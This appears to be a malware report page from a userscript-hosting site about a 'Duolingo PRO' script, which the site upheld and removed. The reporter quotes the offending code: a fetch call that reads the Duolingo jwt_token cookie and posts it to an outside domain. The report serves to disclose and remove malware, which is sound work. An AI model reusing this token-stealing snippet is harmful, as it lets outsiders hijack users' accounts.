Duolingo PRO ha sido denunciado 23/03/2025 como Software malicioso

La persona que ha notificado de la infracción dice:

This script grabs the JWT token of duolingo and sends it to a fishy link code below:

let apiURL = "https://api.duolingopro.net";

This is the real payload part


            const response = await fetch(apiURL + "/feedback", {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'Authorization': `Bearer ${document.cookie.split(';').find(cookie => cookie.includes('jwt_token')).split('=')[1]}`
                },
                body: JSON.stringify(payload)
            });

This script has had 1 previous upheld or fixed report.

anonymoushackerIV (el usuario denunciado) ha hecho:

interstellar (el usuario denunciado) ha hecho:

Se ha confirmado tu denuncia y ha sido eliminado.